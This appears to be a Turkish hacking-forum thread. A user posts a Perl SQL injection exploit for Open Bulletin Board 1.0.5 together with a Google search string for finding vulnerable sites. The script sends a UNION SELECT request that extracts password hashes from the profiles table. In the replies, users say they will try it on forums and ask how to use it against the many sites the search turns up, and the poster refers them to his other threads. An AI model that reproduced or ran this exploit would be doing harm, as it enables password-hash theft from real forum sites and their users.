OpenBB 1.0.5 Perl Exploit

[OuTLaWsys]

##Vulnerable Systems:
##* Open Bulletin Board version 1.0.5
##
## type in google for inurlowered By Open Bulletin Board 1.0.5

#!/usr/bin/perl -w

# OpenBB sql injection
# tested on Open Bulletin Board 1.0.5 with mysql
# (c)oded by x97Rang 2005 RST/GHC
# Gr33tz: __blf, 1dt.w0lf

use IO::Socket;

if (@ARGV != 3)
{
print "\nUsage: $0 [server] [path] [id]\n";
print "like $0 forum.mysite.com / 1\n";
print "If found nothing - forum NOT vulnerable\n\n";
exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?CID=999+union+select+1,". "1,password,1,1,1,1,1,1,1,1,id,". "1+from+profiles+where+id=". "$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$id);

while(<$socket>)
{
if (/\>(\w{32})\</) { print "$1\n"; }
}

 

[Cr4ck3r]

Baba Işe Yariyosa Forumlari Azina Sçilir Bunla Open Bulletin In Yenisi Kapatmiş Diyolar Tüm Açiklari Ama Hemen Deniyorum Outlaw Saol

 

[OuTLaWsys]

işe yarıyor kardeş hiç mrk etme boş şey vermem buraya ben

 

[SCRiPToRiuM]

kızmazsanız bişey sorcam ya şu exploiti bi türlü anlamıyorum şimdi biz bunu napcaz ben googleye girdim Powered By Open Bulletin Board 1.0.5 yazdım dolu site çıktı karşıma napcam şimdi yardım ederseniz çok sevinirim bi de bütün exploitler aynı yöntemle i uygulanıyo.şimdiden tşk

 

[OuTLaWsys]

bak kızıorum nie kızıyorum çnkü okumuyosunuz.Bak kardeş ben şimdi sana anlatmıycam olayı.şimdi hackhell de benim açtığım konuları bi arat bak ben nasıl anlatmışım oku onları ordan bişeyler çıkarıp bu exploiti kullanman gerek eğer okumuş olsaydın yapardın işte ben bu yüzden kızıyorum normalde zaten exploiti açıklamalı koyardım ama bakıorum gösterim sayısı 15 o zaman nie emek döküp uğraşayım diorum anlayan adam exploiti kullanıp yapsın ve bundan sonrada anlatım yapmıycam nese herkese kolay gelsin